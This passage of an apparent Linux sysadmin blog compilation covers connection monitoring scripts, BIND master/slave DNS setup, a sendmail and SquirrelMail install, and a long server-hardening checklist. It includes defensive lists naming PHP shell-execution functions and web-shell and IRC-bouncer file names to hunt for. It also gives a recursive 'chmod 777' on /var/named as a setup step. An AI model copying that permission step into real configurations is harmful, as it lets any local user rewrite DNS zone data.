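tcp        0      0 192.168.1.10:22         192.168.1.50:51234      ESTABLISHED
tcp        0      0 192.168.1.10:80         203.0.113.7:40001       SYN_RECV
tcp        0      0 192.168.1.10:80         203.0.113.7:40002       SYN_RECV
tcp        0      0 192.168.1.10:80         203.0.113.7:40003       SYN_RECV
tcp        0      0 192.168.1.10:80         198.51.100.4:33000      ESTABLISHED
tcp        0      0 192.168.1.10:80         198.51.100.4:33001      TIME_WAIT
EOF

echo "== connections per state =="; state_counts "$CAP"
echo "== connections per remote IP =="; remote_ip_counts "$CAP"
echo "== remote IPs with more than 2 SYN_RECV =="; flag_abusers "$CAP" 2 SYN_RECV
```

On a live host replace the sample file with the output of "netstat -nat > capture.txt" (or "ss -tan", whose columns differ only in the header). Keep the capture: if you do block an address, the file is your evidence of why.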

A few more tools:

nmap – scan your server for open ports.
lsof – list open files, network connections and much more.
ntop web based tool – ntop is the best tool to see network usage in a way similar to what top command does for processes i.e. it is network traffic monitoring software. You can see network status, protocol wise distribution of traffic for UDP, TCP, DNS, HTTP and other protocols.
Conky – Another good monitoring tool for the X Window System. It is highly configurable and is able to monitor many system variables including the status of the CPU, memory, swap space, disk storage, temperatures, processes, network interfaces, battery power, system messages, e-mail inboxes etc.
GKrellM – It can be used to monitor the status of CPUs, main memory, hard disks, network interfaces, local and remote mailboxes, and many other things.
vnstat – vnStat is a console-based network traffic monitor. It keeps a log of hourly, daily and monthly network traffic for the selected interface(s).
htop – htop is an enhanced version of top, the interactive process viewer, which can display the list of processes in a tree form.
mtr – mtr combines the functionality of the traceroute and ping programs in a single network diagnostic tool.

 

2) ### Script for hardware information

#!/bin/bash

#
# server_info.sh - display server hardware info
#
# 2008 - Mike Golvach - eggi@comcast.net
#
# Creative Commons Attribution-Noncommercial-Share Alike 3.0 United States License
#

hwinfo="/usr/sbin/hwinfo --short"
hostname=`hostname`
separator="----------------------------------------"
echo $separator
echo "System Information For $hostname"
echo $separator
echo $separator
echo SERVER - MEMORY
echo $separator
/usr/sbin/hwinfo --bios|egrep 'OEM id:|Product id:|CPUs|Product:|Serial:|Physical Memory Array:|Max. Size:|Memory Device:|Location:|Size:|Speed:|Location:'|sed -e 's/"//g' -e '/^ *Speed: */s/Memory Device:/\n Memory Device:/' -e 's/\(Max. Speed:\)/CPU \1 MHz/' -e 's/\(Current Speed\)/CPU \1 MHz/'
echo $separator
echo SMP
echo $separator
$hwinfo --smp
echo $separator
echo CPU
echo $separator
$hwinfo --cpu
echo $separator
echo CD_ROM
echo $separator
/usr/sbin/hwinfo --cdrom|egrep '24:|Device File:|Driver:'|awk -F":" '{ if ( $1 ~ /[0-9][0-9]*/ ) print $0; else print " " $2}'|sed -e 's/^.*[0-9] //' -e 's/ //' -e 's/"//g'
echo $separator
echo DISK
echo $separator
$hwinfo --disk
echo $separator
echo PARTITION
echo $separator
$hwinfo --partition
echo $separator
echo NETWORK
echo $separator
$hwinfo --network
echo $separator
echo NETCARD
echo $separator
$hwinfo --netcard
echo $separator

 

3) #### Simple ping monitor on Linux

#!/bin/bash
# Simple SHELL script for Linux and UNIX system monitoring with
# ping command
# -------------------------------------------------------------------------
# Copyright (c) 2006 nixCraft project <http://www.cyberciti.biz/fb/>
# This script is licensed under GNU GPL version 2.0 or above
# -------------------------------------------------------------------------
# This script is part of nixCraft shell script collection (NSSC)
# Visit http://bash.cyberciti.biz/ for more information.
# -------------------------------------------------------------------------
# Setup email ID below
# See URL for more info:
# http://www.cyberciti.biz/tips/simple-linux-and-unix-system-monitoring-with-ping-command-and-scripts.html
# -------------------------------------------------------------------------

# add ip / hostname separated by white space
HOSTS="cyberciti.biz theos.in router"

# number of ping requests per host (a single packet produces false alarms on a lossy link; 3 is safer)
COUNT=1

# email report when
SUBJECT="Ping failed"
EMAILID="me@mydomain.com"
for myHost in $HOSTS
do
    # packets received; empty if ping could not even resolve the host, hence the ${count:-0} below
    count=$(ping -c $COUNT $myHost 2>/dev/null | grep 'received' | awk -F',' '{ print $2 }' | awk '{ print $1 }')
    if [ "${count:-0}" -eq 0 ]; then
        # 100% failed
        echo "Host : $myHost is down (ping failed) at $(date)" | mail -s "$SUBJECT" $EMAILID
    fi
done

 

 

4) ## Beginner's script: show processes every N seconds

#!/bin/bash
# Write a shell script to display the processes running on the system every
# 30 seconds, but only 3 times.
# -------------------------------------------------------------------------
# Copyright (c) 2008 nixCraft project <http://www.cyberciti.biz/fb/>
# This script is licensed under GNU GPL version 2.0 or above
# -------------------------------------------------------------------------
# This script is part of nixCraft shell script collection (NSSC)
# Visit http://bash.cyberciti.biz/ for more information.
# -------------------------------------------------------------------------
#
# for loop 3 times
for r in 1 2 3
do
    # see every process on the system
    echo "**************************** x^x^x ****************************"
    ps -e
    echo "**************************** x^x^x ****************************"
    # sleep for 30 seconds (the original said 30 in the comment but slept 3)
    sleep 30
done

 

 

 


DNS: Linux Bind Installation

Posted: August 4, 2010 in DNS, LINUX

What is BIND?

BIND is DNS server software: it translates domain names into IP addresses (and, with reverse zones, back again). Domain names are alphabetic and easier to remember, so when browsing the Internet we do not need to remember IP addresses. For example, the domain name www.yourdomain.com might translate to 192.168.0.1.

1. Check the BIND packages

[root@server named]# rpm -qa bind*

bind-libs-9.2.4-2
bind-utils-9.2.4-2
bind-9.2.4-2

2. Setting Computer NS1 With IP 192.168.0.1 As Nameserver And Domain Name yourdomain.com

[root@server ~]# cat /etc/resolv.conf

nameserver 192.168.0.1


3. Setting File /etc/named.conf

[root@server ~]# nano /etc/named.conf

//
// named.conf for Red Hat caching-nameserver
//
options {
   directory "/var/named";
   dump-file "/var/named/data/cache_dump.db";
   statistics-file "/var/named/data/named_stats.txt";
/*
 * If there is a firewall between you and nameservers you want
 * to talk to, you might need to uncomment the query-source
 * directive below.  Previous versions of BIND always asked
 * questions using port 53, but BIND 8.1 uses an unprivileged
 * port by default.
 */
 // query-source address * port 53;
};

//
// a caching only nameserver config
//
controls {
 inet 127.0.0.1 allow { localhost; } keys { rndckey; };
};

zone "localhost" IN {
   type master;
   file "localhost.zone";
   allow-update { none; };
};

zone "yourdomain.com" IN {
   type master;
   file "/var/named/yourdomain.com.zone";
   allow-update { none; };
};

zone "0.168.192.in-addr.arpa" IN {
   type master;
   file "/var/named/0.168.192.rev";
   allow-update { none; };
};

include "/etc/rndc.key";

4. Setting File /var/named/yourdomain.com.zone

First you must create the file yourdomain.com.zone; you can use this syntax: [root@server ~]# nano /var/named/yourdomain.com.zone
$TTL            86400
@                 IN SOA            yourdomain.com.  root.yourdomain.com. (
100     ; serial
1H      ; refresh
1M      ; retry
1W      ; expiry
1D )    ; minimum
@                   IN NS                 ns1.yourdomain.com.
@                   IN A                 192.168.0.1
ns1                 IN A                 192.168.0.1
@                   IN MX   10           mail.yourdomain.com.
mail                IN A                 192.168.0.1
WWW                 IN A                 192.168.0.1

5. Setting File /var/named/0.168.192.rev

First you must create the file 0.168.192.rev; you can use this syntax: [root@server ~]# nano /var/named/0.168.192.rev
$TTL    86400
@                 IN SOA          yourdomain.com. root.yourdomain.com. (
100     ; serial
1H      ; refresh
1M      ; retry
1W      ; expiry
1D)     ; minimum

@                 IN NS            ns1.yourdomain.com.
1                 IN PTR           binggo.yourdomain.com.

6. nslookup yourdomain.com

[root@server ~]# nslookup yourdomain.com

Server:         192.168.0.1
Address:        192.168.0.1#53

Name:   yourdomain.com
Address: 192.168.0.1

7. dig yourdomain.com

[root@server ~]# dig yourdomain.com

8. Configuration for NS1 is finished

If you see errors, check that named can read /var/named. A recursive chmod 777, as shown below, makes such errors go away but also lets every local user rewrite your zone data; on a real server give /var/named to the named user and group instead (directories 750, files 640) with only slaves/ and data/ writable by the daemon. Also add an allow-transfer statement to the yourdomain.com and reverse zones on NS1 listing only the secondary's address, otherwise anyone can pull the whole zone with an AXFR query. Note too that the PTR target in 0.168.192.rev needs its trailing dot, or BIND appends the zone name to it.

[root@server ~]# chmod 777 -Rvf /var/named/

mode of `/var/named/’ changed to 0777 (rwxrwxrwx)
mode of `/var/named/named.zero’ changed to 0777 (rwxrwxrwx)
mode of `/var/named/localhost.zone’ changed to 0777 (rwxrwxrwx)
mode of `/var/named/198.99.208.rev’ changed to 0777 (rwxrwxrwx)
mode of `/var/named/data’ changed to 0777 (rwxrwxrwx)
mode of `/var/named/named.local’ changed to 0777 (rwxrwxrwx)
mode of `/var/named/named.ca’ changed to 0777 (rwxrwxrwx)
mode of `/var/named/named.ip6.local’ changed to 0777 (rwxrwxrwx)
mode of `/var/named/localdomain.zone’ changed to 0777 (rwxrwxrwx)
mode of `/var/named/yourdomain.com.zone’ changed to 0777 (rwxrwxrwx)
mode of `/var/named/named.broadcast’ changed to 0777 (rwxrwxrwx)
mode of `/var/named/slaves’ changed to 0777 (rwxrwxrwx)

9. Check The /var/log/messages Log To Find Out If There Are Errors

[root@server ~]# tail /var/log/messages

————————————————–

Document Source: http://www.howtoforge.com/bind-installation-on-centos

Installation Of BIND As A Secondary (Slave) DNS Server

After we have installed BIND as a master DNS server (NS1) (as explained in my recent post), we can now try to set up a secondary DNS server (NS2) with BIND on CentOS. NS2 acts as a backup if there are problems with NS1.

Make sure you’ve successfully set up NS1, as described in my previous post!

NS1 with IP 192.168.0.1
NS2 with IP 192.168.0.2
Our domain: yourdomain.com

Now we can try setting up NS2.

1.  Check your Bind package

[root@server ~]# rpm -qa bind*

bind-libs-9.2.4-2

bind-utils-9.2.4-2

bind-9.2.4-2

2. Setting file /etc/resolv.conf

[root@server ~]# nano /etc/resolv.conf

nameserver 192.168.0.1

3. Setting file /etc/named.conf

[root@server ~]# nano /etc/named.conf

//
// named.conf for Red Hat caching-nameserver
//

options {
directory "/var/named";
dump-file "/var/named/data/cache_dump.db";
statistics-file "/var/named/data/named_stats.txt";

/*
* If there is a firewall between you and nameservers you want
* to talk to, you might need to uncomment the query-source
* directive below. Previous versions of BIND always asked
* questions using port 53, but BIND 8.1 uses an unprivileged
* port by default.
*/

// query-source address * port 53;
allow-transfer {208.99.198.184/32;};
};

//
// a caching only nameserver config
//

controls {
inet 127.0.0.1 allow { localhost; } keys { rndckey; };
};

zone "localhost" IN {
type master;
file "localhost.zone";
allow-update { none; };
};

zone "yourdomain.com" IN {
type slave;
file "/var/named/yourdomain.com.zone";
// allow-update { none; };
allow-transfer { 192.168.0.1/32; };
masters { 192.168.0.1; };
};

zone "0.168.192.in-addr.arpa" IN {
type slave;
file "/var/named/0.168.192.rev";
// allow-update { none; };
allow-transfer { 192.168.0.1/32; };
masters { 192.168.0.1; };
};

include "/etc/rndc.key";

4. Change permission of the directory /var/named

[root@server ~]# chmod 777 -Rvf /var/named/

mode of `/var/named/' changed to 0777 (rwxrwxrwx)
mode of `/var/named/named.zero' changed to 0777 (rwxrwxrwx)
mode of `/var/named/localhost.zone' changed to 0777 (rwxrwxrwx)
mode of `/var/named/data' changed to 0777 (rwxrwxrwx)
mode of `/var/named/named.local' changed to 0777 (rwxrwxrwx)
mode of `/var/named/named.ca' changed to 0777 (rwxrwxrwx)
mode of `/var/named/named.ip6.local' changed to 0777 (rwxrwxrwx)
mode of `/var/named/localdomain.zone' changed to 0777 (rwxrwxrwx)
mode of `/var/named/named.broadcast' changed to 0777 (rwxrwxrwx)
mode of `/var/named/slaves' changed to 0777 (rwxrwxrwx)

5. The zone files /var/named/yourdomain.com.zone and /var/named/0.168.192.rev are transferred from NS1 to NS2 automatically; you do not create them by hand on NS2.

6. Running service named

[root@server ~]# service named restart

Stopping named: [ OK ]

Starting named: [ OK ]

7. Check the log file to see what happened

[root@server ~]# tail /var/log/messages

Aug 3 04:25:42 server named[9362]: listening on IPv4 interface venet0:0, 192.168.0.2#53
Aug 3 04:25:42 server named[9362]: command channel listening on 127.0.0.1#953
Aug 3 04:25:42 server named[9362]: zone localhost/IN: loaded serial 42
Aug 3 04:25:42 server named[9362]: running
Aug 3 04:25:42 server named[9362]: zone yourdomain.com/IN: transferred serial 100
Aug 3 04:25:42 server named[9362]: transfer of 'yourdomain.com/IN' from 192.168.0.1#53: end of transfer
Aug 3 04:25:42 server named[9362]: zone yourdomain.com/IN: sending notifies (serial 100)
Aug 3 04:25:43 server named[9362]: zone 0.168.192.in-addr.arpa/IN: transferred serial 100
Aug 3 04:25:43 server named[9362]: transfer of '0.168.192.in-addr.arpa/IN' from 192.168.0.1#53: end of transfer
Aug 3 04:25:43 server named[9362]: zone 0.168.192.in-addr.arpa/IN: sending notifies (serial 100)

The log shows that the yourdomain.com zone has been transferred: the zone data is now also stored on NS2, so if NS1 is down or has a problem, NS2 holds a copy and can keep answering.

8. Result using nslookup

[root@server ~]# nslookup yourdomain.com

Server: 192.168.0.1
Address: 192.168.0.1#53

Name: yourdomain.com
Address: 192.168.0.1

This query was answered by NS1 (192.168.0.1), the server listed in /etc/resolv.conf.

Now we can try to deactivate NS1 to see if name resolution is still working.

9. First add nameserver 192.168.0.2 to /etc/resolv.conf

[root@server ~]# cat /etc/resolv.conf

nameserver 192.168.0.1
nameserver 192.168.0.2

With NS1 inactive, the resolver falls back to NS2 for this domain. Nothing has to be changed on NS2, because all zone files were transferred from NS1 to NS2.

10. Trying a DNS lookup while NS1 is down

[root@server ~]# nslookup yourdomain.com

Server: 192.168.0.2
Address: 192.168.0.2#53

Name: yourdomain.com
Address: 192.168.0.1

Now if there is any problem with NS1 you can rest assured, because NS2 acts as a backup.
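The slave zones above restrict allow-transfer to the master, which is also what items 26 and 37 of the hardening list later on this page ask you to verify. The script below is an added example, not part of the howtoforge tutorial: it reads a named.conf from stdin and reports, per zone, whether allow-transfer is restricted, open to any host, or missing (inherited), and whether recursion is restricted; the config it runs on is constructed.

```shell
#!/bin/sh
# named.conf audit: zone transfer restrictions and recursion (added example).
# SAMPLE_NAMED_CONF is constructed; one zone is open to "any" and one has no
# allow-transfer at all, so that both findings show up in the report.
SAMPLE_NAMED_CONF='
options {
        directory "/var/named";
        // recursion is deliberately left unrestricted here
};
zone "yourdomain.com" IN {
        type slave;
        file "/var/named/yourdomain.com.zone";
        allow-transfer { 192.168.0.1/32; };
        masters { 192.168.0.1; };
};
zone "example.test" IN {
        type master;
        file "example.test.zone";
        allow-transfer { any; };
};
zone "localhost" IN {
        type master;
        file "localhost.zone";
};
'

# zone_transfer_report: stdin = named.conf; prints "<zone> RESTRICTED|ANY|MISSING".
# Comments are stripped first; braces are counted so nested blocks are handled.
zone_transfer_report() {
  sed -e 's#//.*$##' -e 's/#.*$//' | awk '
    /^[[:space:]]*zone[[:space:]]+"/ {
      match($0, /"[^"]+"/); zone = substr($0, RSTART + 1, RLENGTH - 2)
      inzone = 1; depth = 0; opened = 0; status = "MISSING"
    }
    inzone {
      if ($0 ~ /allow-transfer/)
        status = ($0 ~ /allow-transfer[[:space:]]*[{][[:space:]]*any[[:space:]]*;/) ? "ANY" : "RESTRICTED"
      opens = gsub(/[{]/, "{"); closes = gsub(/[}]/, "}")
      depth += opens - closes
      if (opens > 0) opened = 1
      if (opened && depth == 0) { print zone, status; inzone = 0 }
    }'
}

# recursion_restricted: stdin = named.conf; exit 0 if "recursion no;" or an
# allow-recursion ACL is present, 1 if the server answers recursive queries for anyone.
recursion_restricted() {
  sed -e 's#//.*$##' -e 's/#.*$//' |
    grep -Eq 'recursion[[:space:]]+no[[:space:]]*;|allow-recursion[[:space:]]*[{]'
}

# Stand-alone run against the constructed config.
printf '%s\n' "$SAMPLE_NAMED_CONF" | zone_transfer_report
if printf '%s\n' "$SAMPLE_NAMED_CONF" | recursion_restricted; then
  echo "recursion: restricted"
else
  echo "recursion: OPEN (add 'recursion no;' or an allow-recursion ACL to options)"
fi
```

Run it as `zone_transfer_report < /etc/named.conf` on the real file; a MISSING zone is only acceptable when the options block carries a restrictive allow-transfer of its own.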

Document Source: http://www.howtoforge.com/installation-of-bind-as-a-secondary-slave-dns-server-on-centos

This tutorial explains how you can install and configure SquirrelMail on a RedHat/CentOS/Fedora based mail server which uses Sendmail and Apache.

Scenario:

Primary Mail Server: linuxbox4 (192.168.0.14)
Domain Name: abc.com
Trusted IP Pool: 192.168.0.0/24

Note: Replace domain name and system name and IP according to your scenario.

Prerequisites:

1. DNS is configured with a proper MX record.
2. All necessary packages are installed.

Step 1:

Configure all services to start at boot time.

chkconfig sendmail on
chkconfig httpd  on
chkconfig dovecot on

Step 2:

Configure /etc/hosts file. In this scenario /etc/hosts file should look like this:

192.168.0.14    linuxbox4   www.abc.com 


Step 3:
 
Outgoing Mail Server Configuration (Sendmail):
 
Open /etc/mail/sendmail.mc file and change the following two lines.
 
From:

DAEMON_OPTIONS(`Port=smtp,Addr=127.0.0.1, Name=MTA')dnl 
FEATURE(`accept_unresolvable_domains')dnl 


To: 

dnl DAEMON_OPTIONS(`Port=smtp,Addr=127.0.0.1, Name=MTA')dnl 
dnl FEATURE(`accept_unresolvable_domains')dnl 


Save and exit.
 
- The first change lets sendmail accept incoming mail on all installed NICs. Otherwise the mail server would only accept mail from the local machine itself.

- The second change tells sendmail not to accept mail from mail servers whose PTR record is not configured in DNS. This is a basic level of spam control in sendmail.
 
Generate sendmail.cf file from sendmail.mc file.
 
m4 /etc/mail/sendmail.mc > /etc/mail/sendmail.cf
 
 

Step 4:

Allow RELAY for the trusted (organization's) IP addresses that you want to permit to send mail through this server. In /etc/mail/access we specify all the addresses that will be sending mail through this mail server. At the end of this file add the following line:

192.168.0 RELAY

Save, exit and convert this text file into DB format with the following command:

makemap hash /etc/mail/access.db < /etc/mail/access
 
 

Step 5:

Tell sendmail that it will act as the primary mail server for the "abc.com" domain. We do this by adding the domain name to /etc/mail/local-host-names. If this server acts as a mail server for more than one domain, add each domain to this file on a separate line. Open /etc/mail/local-host-names and add "abc.com" at the end of the file. Note: a mail server can act as the primary mail server for more than one domain at the same time, and can also act as primary for some domains and secondary for others at the same time.

Step 6:

All system users are mail users as well. Now create mail-only users:

useradd -s /usr/sbin/smrsh mailuser1
useradd -s /usr/sbin/smrsh mailuser2

Also set their passwords:

passwd mailuser1
passwd mailuser2

Step 7:

Finally restart the sendmail service:

service sendmail restart

Step 8:

Incoming Mail Server Configuration (Dovecot): Open /etc/dovecot.conf and change the following line.

From:

#protocols = imap  pop3

To:

protocols = imap imaps pop3 pop3s


Save and exit and restart dovecot service.
 
service dovecot restart
 
 
 
 

Step 9:

Webserver Configuration (Apache): Apache comes pre-configured; you just have to change the ServerName parameter in /etc/httpd/conf/httpd.conf and restart the service. Open /etc/httpd/conf/httpd.conf and set the ServerName parameter:

ServerName www.abc.com


Save and exit and restart httpd service.
 
service httpd restart
 
 

Installation & Configuration of Squirrelmail

• Check that Squirrelmail is installed on the system:

# rpm -q squirrelmail

• If Squirrelmail is not installed on the system, install it through rpm:

# rpm -ivh squirrelmail

• Now go to the Squirrelmail directory, located in /usr/share:

# cd /usr/share/squirrelmail

• Then go to the config directory:

# cd config

• Now run one of the following commands to configure Squirrelmail:

# ./conf.pl
OR
# perl conf.pl

• Now select option 1 (Organization Preferences):

Organization Name      : YOUR_ORG_NAME
Organization Title     : YOUR_ORG_NAME
Webmail Provider link  : http://YOUR_ORG_SITE_ADDRESS
Provider name          : YOUR_ORG_NAME

• Now select option 2 (Server Settings):

Domain            : abc.com
Sendmail or SMTP  : Sendmail
IMAP Server       : localhost
IMAP Port         : 143
Server software   : uw
Delimiter         : /

• Now select option 3 (Folder Settings):

Default Folder Prefix         : mail/
Show Folder Prefix Option     : true
Trash Folder                  : Trash
Sent Folder                   : Sent
Drafts Folder                 : Drafts
By default, move to trash     : true
By default, move to sent      : true
By default, save as draft     : true
List Special Folders First    : true
Show Special Folders Color    : true
Auto Expunge                  : true
Default Sub. of INBOX         : false
Show 'Contain Sub.' Option    : true
Default Unseen Notify         : 2
Default Unseen Type           : 1
Auto Create Special Folders   : true
Folder Delete Bypasses Trash  : false
Enable /NoSelect folder fix   : false

• Now select option 4 (General Settings):

Data Directory                : /var/lib/squirrelmail/prefs/
Attachment Directory          : /var/spool/squirrelmail/attach/
Directory Hash Level          : 0
Default Left Size             : 150
Usernames in Lowercase        : false
Allow use of priority         : true
Hide SM attributions          : false
Allow use of receipts         : true
Allow editing of identity     : true
Allow editing of name         : true
Remove username from header   : false
Allow server thread sort      : true
Allow server-side sorting     : true
Allow server charset search   : true
Enable UID support            : true
PHP session name              : SQMSESSID
Location base                 :

• Now choose option 8 (Plugins) and select the plugins that you wish to provide to your webmail users.

• Now open the browser with the following link: http://YOUR_SITE_ADDRESS/webmail OR http://192.168.0.14/webmail

How to Secure a Linux Server.

1. Kernel recompile with GR security

2. firewall = CSF

3. Stop unnecessary processes

4. Install Logcheck

5. Install Logwatch

   Optimizing host.conf and sysctl.conf
   http://www.eth0.us/node/104

To modify LogWatch, SSH into server and login as root. At command prompt type: pico -w /etc/log.d/conf/logwatch.conf

Scroll down to

MailTo = root

and change to

Mailto = your@email.com

Note: Set the e-mail address to an offsite account in case you get hacked.

Now scroll down to

Detail = Low

Change that to Medium, or High…

Detail = 5 or Detail = 10

Note: High will give you more detailed logs with all actions. Save and exit.

6. If cpanel server then WHM configuration check

7. OpenSSH configuration check

8. Switch from proftpd to pure-ftpd

9. Rootkit Hunter

rkhunter:


1. Login to your server via SSH as root. Then Type: cd /usr/local/src/

2. Download RKHunter Version 1.1.4

Type: wget http://downloads.rootkit.nl/rkhunter-1.1.4.tar.gz

3. Extract files

Type: tar -xzvf rkhunter-1.1.4.tar.gz

4. Type: cd rkhunter

5. Type: ./installer.sh

6. Let's set up RKHunter to e-mail you daily scan reports.

Type: pico -w /etc/cron.daily/rkhunter.sh

Add the following:

#!/bin/bash
(/usr/local/bin/rkhunter -c --cronjob 2>&1 | mail -s "RKhunter Scan Details" replace-this@with-your-email.com)

Replace the e-mail above with your e-mail!!

It is best to send the e-mail to an off-site address, so that if the box IS compromised the hacker can't erase the scan report unless he hacks another server too.

Type: chmod +x /etc/cron.daily/rkhunter.sh

10. Chkrootkit

Installing chkrootkit

   [root@server ~]# wget ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gz
   [root@server ~]# tar xvfz chkrootkit.tar.gz
   [root@server ~]# ./chkrootkit*/chkrootkit

11. mod_security

12. mod_evasive

13. Host spoof protection

14. Operating System check

15. Name server configuration check

16. Disk check

17. Kernel check

18. Apache tune and check

19. MySQL tune and check

20. Enhanced log rotation

21. Day of the week backup rotations

22. Secure /tmp /var/tmp /dev/shm

23. Libsafe for 2.4 kernels

24. Exploit check

25. Delete unnecessary OS users

26. Disable open DNS recursion

27. Enhanced path protection

28. Remove SUID/GUID from binaries

29. PHP hardening

30. phpsuexec

31. Disable vulnerable phpBB installs

32. Initial cPanel configuration

33. Check iptables is configured

34. Check incoming MySQL port

35. Check /etc/cron.daily/logrotate

36. Check /etc/resolv.conf for localhost entry

37. Check /etc/named.conf for recursion restrictions

38. Check server runlevel

39. Check nobody cron

40. Check Operating System support

41. Check SSHv1 is disabled

42. Check SSH on non-standard port

43. Check SSH PasswordAuthentication

44. Check telnet port 23 is not in use

45. Check shell limits

46. Check Background Process Killer

47. Check root forwarder

48. Check exim for extended logging

49. Check php for enable_dl: enable_dl = Off

50. Check php for disable_functions=

disable_functions = show_source, system, shell_exec, passthru, exec, phpinfo, popen, proc_open, allow_url_fopen

51. Check php for register_globals: register_globals = Off

52. Check php open_basedir protection
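Items 49 to 52 are manual checks; the functions below, an added example rather than something from this list's author, read a php.ini from stdin and report the functions from item 50 that are not in disable_functions, register_globals or enable_dl not set to Off, and a missing open_basedir. The sample php.ini is constructed and deliberately leaves two gaps.

```shell
#!/bin/sh
# php.ini hardening audit for items 49-52 (added example; the sample ini is
# constructed and deliberately leaves "system" enabled and register_globals On).
SAMPLE_PHP_INI='
; constructed sample php.ini
engine = On
enable_dl = Off
register_globals = On
disable_functions = show_source, shell_exec,passthru, exec, phpinfo, popen , proc_open
open_basedir = /var/www/html:/tmp
'

# Functions item 50 expects in disable_functions (allow_url_fopen is an ini
# directive rather than a function, so it is not part of this list).
REQUIRED_DISABLED="show_source system shell_exec passthru exec phpinfo popen proc_open"

# php_ini_get <directive>: stdin = php.ini; prints the value, or nothing if unset.
php_ini_get() {
  awk -v key="$1" -F= '
    /^[[:space:]]*;/ || !/=/ { next }                  # comments and non-assignments
    {
      k = $1; gsub(/^[[:space:]]+|[[:space:]]+$/, "", k)
      if (k == key) {
        v = substr($0, index($0, "=") + 1)
        gsub(/^[[:space:]]+|[[:space:]]+$/, "", v)
        print v; exit
      }
    }'
}

# php_ini_missing_disabled: stdin = php.ini; prints required functions not yet disabled.
php_ini_missing_disabled() {
  disabled=$(php_ini_get disable_functions | tr ',' '\n' | tr -d ' \t')
  for fn in $REQUIRED_DISABLED; do
    printf '%s\n' "$disabled" | grep -qx "$fn" || printf '%s\n' "$fn"
  done
}

# php_ini_audit: stdin = php.ini; prints one FAIL line per finding, exit 1 if any.
php_ini_audit() {
  conf=$(cat)
  rc=0
  for fn in $(printf '%s\n' "$conf" | php_ini_missing_disabled); do
    printf 'FAIL disable_functions lacks %s\n' "$fn"; rc=1
  done
  for d in register_globals enable_dl; do                 # items 49 and 51
    v=$(printf '%s\n' "$conf" | php_ini_get "$d")
    case "$v" in
      Off|off|0) ;;
      *) printf 'FAIL %s = %s (want Off)\n' "$d" "${v:-unset}"; rc=1 ;;
    esac
  done
  [ -n "$(printf '%s\n' "$conf" | php_ini_get open_basedir)" ] ||
    { printf 'FAIL open_basedir is not set\n'; rc=1; }     # item 52
  return $rc
}

# Stand-alone run against the constructed sample.
if printf '%s\n' "$SAMPLE_PHP_INI" | php_ini_audit; then
  echo "php.ini: OK"
else
  echo "php.ini: findings listed above"
fi
```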

53. Check phpsuexec

54. Check cPanel login is SSL only

55. Check boxtrapper is disabled

56. Check max emails per hour is set

57. Check whether users can reset passwords via email

58. Check whether native cPanel SSL is enabled

59. Check compilers

60. Check Anonymous FTP access

61. Check allow remote domains

62. Check block common domains

63. Check allow park domains

64. Check package updates

65. Check security updates

66. Check melange chat server

67. service cups stop; chkconfig cups off

68. service xfs stop; chkconfig xfs off

69. service atd stop; chkconfig atd off

70. service nfslock stop; chkconfig nfslock off

71. service canna stop; chkconfig canna off

72. service FreeWnn stop; chkconfig FreeWnn off

73. service cups-config-daemon stop; chkconfig cups-config-daemon off

74. service iiim stop; chkconfig iiim off

75. service mDNSResponder stop; chkconfig mDNSResponder off

76. service nifd stop; chkconfig nifd off

77. service rpcidmapd stop; chkconfig rpcidmapd off

78. service bluetooth stop; chkconfig bluetooth off

79. service anacron stop; chkconfig anacron off

80. service gpm stop; chkconfig gpm off

81. service saslauthd stop; chkconfig saslauthd off

82. service avahi-daemon stop; chkconfig avahi-daemon off

83. service avahi-dnsconfd stop; chkconfig avahi-dnsconfd off

84. service hidd stop; chkconfig hidd off

85. service pcscd stop; chkconfig pcscd off

86. service sbadm stop; chkconfig sbadm off

87. service webmin stop; chkconfig webmin off

88. Add Load Alert Scripts with 1 min cron

   #!/bin/bash
   # uptime alert script: mail when the 1-minute load average exceeds 4
   UP=`uptime | awk '{print $(NF-2)}' | cut -d. -f1`
   if test "$UP" -gt 4
   then
   uptime | mail -s "**SERVER LOAD is $UP" mailadd@mail.com
   fi

89. Ignore ping:

iptables -A INPUT -p icmp -j DROP

echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all

vi /etc/sysctl.conf

Append the following line:

net.ipv4.icmp_echo_ignore_all = 1

90. Find directory with 777 permission.

              find . -type d -perm 777

91. Check for open ports using the nmap command.

92. Disable identification output for Apache

To disable the version output for Apache, SSH into the server and log in as root.

At the command prompt type: pico /etc/httpd/conf/httpd.conf

Scroll (way) down and change the following line to:

ServerSignature Off

Restart Apache.

At the command prompt type: /etc/rc.d/init.d/httpd restart

93. Change the ssh ListenAddress in /etc/ssh/sshd_config

94. PermitRootLogin no

95. Add a root login alert

vi .bash_profile

   echo 'ALERT - Root Shell Access on:' `date` `who` | mail -s "Alert: Root Access from `who | awk '{print $6}'`" your@email.com

96. Set an SSH legal message in /etc/motd

97. Use locate to look for suspicious files:

   locate shell.php
   locate irc
   locate eggdrop
   locate bnc
   locate BNC
   locate ptlink
   locate BitchX
   locate guardservices
   locate psyBNC
   locate .rhosts

98. Perform some UDP and TCP port scans here:

http://www.hackerwatch.org/probe/

This site is not bad either: https://grc.com/x/ne.dll?bh0bkyd2

99. Check /var/log/secure, /var/log/messages and the log files of the other running services to see if there are any issues.

100. Check your box to see if performance has degraded or if the machine is being overused.

For that, use the commands

vmstat

    Displays information about memory, cpu and disk.
    Ex: bash# vmstat 1 4 (where 1 is delay and 4 is count)

mpstat

    Displays statistics about CPU utilization. This will help you see whether your CPU is overworked or not.
    Ex: bash# mpstat 1 4 (where 1 is delay and 4 is count)

iostat

    This command displays statistics about the disk system.
    Useful options:
    -d - Gives the device utilization report.
    -k - Display statistics in kilobytes per second.
    Ex: bash# iostat -dk 1 4 (where 1 is delay and 4 is count)

sar

    Displays overall system performance.

Check to see if your server has any hidden processes running.

ps

    Displays the status of all known processes.

lsof

101. List all open files. In Linux everything is considered a file, so you will be able to see almost all of the activity on your system with this command.

    * chmod -R 700 /etc/rc.d/init.d/*
    * Use rpm -Va to find out if an rpm is modified
    * Apply security patches to vulnerable software (ie. patch -p1 < patch file)
    * Remove all unneeded ttys and console logins by removing the entry from /etc/securetty
    * Check system logs (eg: /var/log/messages, /var/log/secure, etc.)
    * Set a password on the boot loader (lilo and grub both support this)
    * Monitor the system (nagios or big brother)

102. Install AIDE (Advanced Intrusion Detection Environment), a free replacement for Tripwire: http://www.cs.tut.fi/~rammer/aide.html

103. Testing phase when in production.

Use tools like nessus, nikto, and nmap to do a penetration test and see how well your server is secured. Also do a stress test.

        

